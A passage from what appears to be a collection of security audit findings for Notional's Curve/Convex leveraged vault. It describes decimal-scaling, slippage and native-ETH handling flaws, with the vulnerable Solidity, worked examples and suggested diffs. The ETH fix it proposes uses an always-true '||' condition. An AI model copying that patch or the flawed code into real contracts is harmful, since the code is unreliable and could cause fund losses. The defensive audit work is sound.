18.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 USDC and 100 DAI\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nThe `secondaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nNext, the code logic attempts to value the secondary balance (50 DAI) in terms of the primary token (USDC) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 DAI * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n```\\n\\n50 DAI should be worth 50 USDC (50 * 10^6). However, the `secondaryAmountInPrimary` shows that it is worth 50,000,000,000,000 USDC (50 * 10^18).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] * 10^6 / 10^18\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] / 10^12\\nprimaryAmount = 50,000,000.00005 = 50 million\\n```\\n\\n50 LP Pool tokens should be worth 100 USDC. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is worth 50 million USDC, which overvalues the LP Pool tokens.\\nIn summary, if a leverage vault has two tokens with different decimals:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will undervalue the LP Pool tokens\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will overvalue the LP Pool tokensчWhen valuing the secondary balance in terms of the primary token using the oracle price, the result should be scaled up or down the decimals of the primary token accordingly if the decimals of the two tokens are different.\\nThe root cause of this issue is in the following portion of the code, which attempts to add the `primaryBalance` and `secondaryAmountInPrimary` before multiplying with the `primaryPrecision`. The `primaryBalance` and `secondaryAmountInPrimary` might not be denominated in the same decimals. Therefore, they cannot be added together without scaling them if the decimals of two tokens are different.\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n```\\n\\nConsider implementing the following changes to ensure that the math within the `_getTimeWeightedPrimaryBalance` function work with tokens with different decimals. The below approach will scale the secondary token to match the primary token's precision before performing further computation.\\n```\\nfunction _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n// Add the line below\\n // Scale secondary balance to primaryPrecision\\n// Add the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Add the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Add the line below\\n secondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\n \\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n \\n// Remove the line below\\n // Make sure primaryAmount is reported in primaryPrecision\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n primaryAmount = (primaryBalance // Add the line below\\n secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n// Add the line below\\n primaryAmount = primaryBalance // Add the line below\\n secondaryAmountInPrimary\\n}\\n```\\n\\nThe `poolContext.primaryBalance` or `poolClaim` are not scaled up to `strategyContext.poolClaimPrecision`. Thus, the `primaryBalance` is not scaled in any form. Thus, I do not see the need to perform any conversion at the last line of the `_getTimeWeightedPrimaryBalance` function.\\n```\\nuint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n```\\n\\nThe following attempts to run through the examples in the previous section showing that the updated function produces valid results after the changes.\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 DAI (18 Deci), Secondary Balance = 50 USDC (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDC * 10^18 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^18 / 10^6 = (50 * 10^18)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^18) + (50 * 10^18) = (100 * 10^18) = 100 DAI\\n```\\n\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 DAI (18 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 DAI * 10^6 / 10^18\\nsecondaryBalance = (50 * 10^18) * 10^6 / 10^18 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\nIf primary token's decimals (e.g. 6) == secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 USDT (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDT * 10^6 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^6 / 10^6 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\n`strategyContext.poolClaimPrecision` set to `CurveConstants.CURVE_PRECISION`, which is `1e18`. `oraclePrice` is always in `1e18` precision.чA vault supporting tokens with two different decimals will undervalue or overvalue the LP Pool tokens.\\nThe affected `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function is called within the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function that is used for valuing strategy tokens in terms of the primary balance. As a result, the strategy tokens will be overvalued or undervalued\\nFollowing are some of the impacts of this issue:\\nIf the strategy tokens are overvalued or undervalued, the users might be liquidated prematurely or be able to borrow more than they are allowed to since the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function is indirectly used for computing the collateral ratio of an account within Notional's `VaultConfiguration.calculateCollateralRatio` function.\\n`expectedUnderlyingRedeemed` is computed based on the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function. If the `expectedUnderlyingRedeemed` is incorrect, it will break the vault settlement process.ч```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n -`oracleSlippagePercentOrLimit` can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION`чmediumчTrade might be settled with a large slippage causing a loss of assets as the `oracleSlippagePercentOrLimit` limit is not bounded and can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION` threshold.\\nThe code at Line 73-75 only checks if the `oracleSlippagePercentOrLimit` is within the `Constants.SLIPPAGE_LIMIT_PRECISION` if `useDynamicSlippage` is `true`. If the trade is performed without dynamic slippage, the trade can be executed with an arbitrary limit.\\n```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n\\nThe `StrategyUtils._executeTradeExactIn` function is utilized by the Curve Vault.чConsider restricting the slippage limit when a trade is executed without dynamic slippage.\\n```\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n// Remove the line below\\n }\\n// Add the line below\\n } else {\\n// Add the line below\\n require(params.oracleSlippagePercentOrLimit != 0 && params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION_FOR_NON_DYNAMIC_TRADE);\\n// Add the line below\\n } \\n```\\nчTrade might be settled with a large slippage causing a loss of assets.ч```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n -Oracle slippage rate is used for checking primary and secondary ratioчmediumчThe oracle slippage rate (oraclePriceDeviationLimitPercent) is used for checking the ratio of the primary and secondary tokens to be deposited into the pool.\\nAs a result, changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot and oracle prices can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nThe `_checkPriceLimit` function is for the purpose of comparing the spot price with the oracle price. Thus, the slippage (oraclePriceDeviationLimitPercent) is specially selected for this purpose.\\n```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n\\nHowever, it was observed that `_checkPriceLimit` function is repurposed for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances within the `_checkPrimarySecondaryRatio` function during reinvestment.\\nThe `oraclePriceDeviationLimitPercent` setting should not be used here as it does not involve any oracle data. Thus, the correct way is to define another setting specifically for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\nчThere is a difference between the slippage for the following two items:\\nAllowable slippage between the spot price and oracle price\\nAllowable slippage between the ratio of the primary and secondary tokens to be deposited to the pool against the pool's balances\\nSince they serve a different purposes, they should not share the same slippage. Consider defining a separate slippage setting and function for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.чChanging the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot price and oracle price can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nAdditionally, the value chosen for the `oraclePriceDeviationLimitPercent` is to compare the spot price with the oracle price. Thus, it might not be the optimal value for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.ч```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n -Logic Error due to different representation of Native ETH (0x0 & 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)чmediumчUnexpected results might occur during vault initialization if either of the pool's tokens is a Native ETH due to the confusion between `Deployments.ETH_ADDRESS (address(0))` and `Deployments.ALT_ETH_ADDRESS (0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)`.\\nThe `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is explicitly converted to `Deployments.ETH_ADDRESS (address(0)` during deployment.\\n```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n\\nIt was observed that there is a logic error within the `Curve2TokenConvexVault.initialize` function. Based on Lines 56 and 59 within the `Curve2TokenConvexVault.initialize` function, it assumes that if either the primary or secondary token is ETH, then the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will be set to `Deployments.ALT_ETH_ADDRESS`, which point to `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`.\\nHowever, this is incorrect as the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` has already been converted to `Deployments.ETH_ADDRESS (address(0))` during deployment. Refer to the constructor of `Curve2TokenPoolMixin`.\\nThus, the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will never be equal to `Deployments.ALT_ETH_ADDRESS`, and the condition at Lines 56 and 59 will always evaluate to True.\\n```\\nFile: Curve2TokenConvexVault.sol\\ncontract Curve2TokenConvexVault is Curve2TokenVaultMixin {\\n..SNIP..\\n function initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n {\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n }\\n```\\n\\nAs a result, if the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is `Deployments.ETH_ADDRESS (address(0))`, the code will go ahead to call the `checkApprove` function, which might cause unexpected results during vault initialization.чIf the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is equal to `Deployments.ALT_ETH_ADDRESS` or `Deployments.ETH_ADDRESS`, this means that it points to native ETH and the `checkApprove` can be safely skipped.\\n```\\nfunction initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n{\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n// Remove the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS || PRIMARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n// Remove the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS || SECONDARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n}\\n```\\nчUnexpected results during vault initialization if either of the pool's tokens is a Native ETH.ч```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n -Ineffective slippage mechanism when redeeming proportionallyчhighчA trade will continue to be executed regardless of how bad the slippage is since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. Thus, a trade might incur significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `params.minPrimary` and `params.minSecondary` are calculated automatically based on the share of the Curve pool with a small discount within the `Curve2TokenConvexHelper._executeSettlement` function (Refer to Line 124 below)\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / // @audit-info poolSlippageLimitPercent = 9975, # 0.25%\\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)); // @audit-info VAULT_PERCENT_BASIS = 1e4 = 10000\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen LP tokens are redeemed proportionally via the Curve Pool's `remove_liquidity` function, the tokens received are based on the share of the Curve pool as the source code.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity(\\n _amount: uint256,\\n _min_amounts: uint256[N_COINS],\\n) -> uint256[N_COINS]:\\n \"\"\"\\n @notice Withdraw coins from the pool\\n @dev Withdrawal amounts are based on current deposit ratios\\n @param _amount Quantity of LP tokens to burn in the withdrawal\\n @param _min_amounts Minimum amounts of underlying coins to receive\\n @return List of amounts of coins that were withdrawn\\n \"\"\"\\n amounts: uint256[N_COINS] = self._balances()\\n lp_token: address = self.lp_token\\n total_supply: uint256 = ERC20(lp_token).totalSupply()\\n CurveToken(lp_token).burnFrom(msg.sender, _amount) # dev: insufficient funds\\n\\n for i in range(N_COINS):\\n value: uint256 = amounts[i] * _amount / total_supply\\n assert value >= _min_amounts[i], \"Withdrawal resulted in fewer coins than expected\"\\n\\n amounts[i] = value\\n if i == 0:\\n raw_call(msg.sender, b\"\", value=value)\\n else:\\n assert ERC20(self.coins[1]).transfer(msg.sender, value)\\n\\n log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply - _amount)\\n\\n return amounts\\n```\\n\\nAssume a Curve Pool with the following state:\\nConsists of 200 US Dollars worth of tokens (100 DAI and 100 USDC). DAI is the primary token\\nDAI <> USDC price is 1:1\\nTotal Supply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `49.875 DAI` as `params.minPrimary` and `49.875 USDC` as `params.minSecondary` based on the following calculation\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (100 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 100 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 49.875 DAI\\n\\nminSecondary = same calculation = 49.875 USDC\\n```\\n\\nCurve Pool's `remove_liquidity` function will return `50 DAI` and `50 USDC` if 50 LP Pool Tokens are redeemed.\\nNote that `TwoTokenPoolUtils._getMinExitAmounts` function performs the calculation based on the spot balance of the pool similar to the approach of the Curve Pool's `remove_liquidity` function. However, the `TwoTokenPoolUtils._getMinExitAmounts` function applied a discount to the returned result, while the Curve Pool's `remove_liquidity` function did not.\\nAs such, the number of tokens returned by Curve Pool's `remove_liquidity` function will always be larger than the number of tokens returned by the `TwoTokenPoolUtils._getMinExitAmounts` function regardless of the on-chain economic condition or the pool state (e.g. imbalance). Thus, the minimum amounts (minAmounts) pass into the Curve Pool's `remove_liquidity` function will never be triggered under any circumstance.\\n```\\na = Curve Pool's remove_liquidity => x DAI\\nb = TwoTokenPoolUtils._getMinExitAmounts => (x DAI - 0.25% discount)\\na > b => true (for all instances)\\n```\\n\\nThus, the `TwoTokenPoolUtils._getMinExitAmounts` function is not effective in determining the slippage when redeeming proportionally.чWhen redeeming proportional, theTwoTokenPoolUtils._getMinExitAmounts function can be removed. Instead, give the caller the flexibility to define the slippage/minimum amount (params.minPrimary and params.minSecondary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a proportional trade (remove_liquidity) is to call the Curve's Pool `calc_token_amount` function off-chain and reduce the values returned by the allowed slippage amount.\\nNote that `calc_token_amount` cannot be used solely on-chain for computing the minimum amount because the result can be manipulated because it uses spot balances for computation.\\nSidenote: Removing `TwoTokenPoolUtils._getMinExitAmounts` function also removes the built-in spot price and oracle price validation. Thus, the caller must remember to define the slippage. Otherwise, the vault settlement will risk being sandwiched. Alternatively, shift the `strategyContext._checkPriceLimit(oraclePrice, spotPrice)` code outside the `TwoTokenPoolUtils._getMinExitAmounts` function.чA trade will always be executed even if it returns fewer than expected assets since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. Thus, a trade might incur unexpected slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.ч```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, 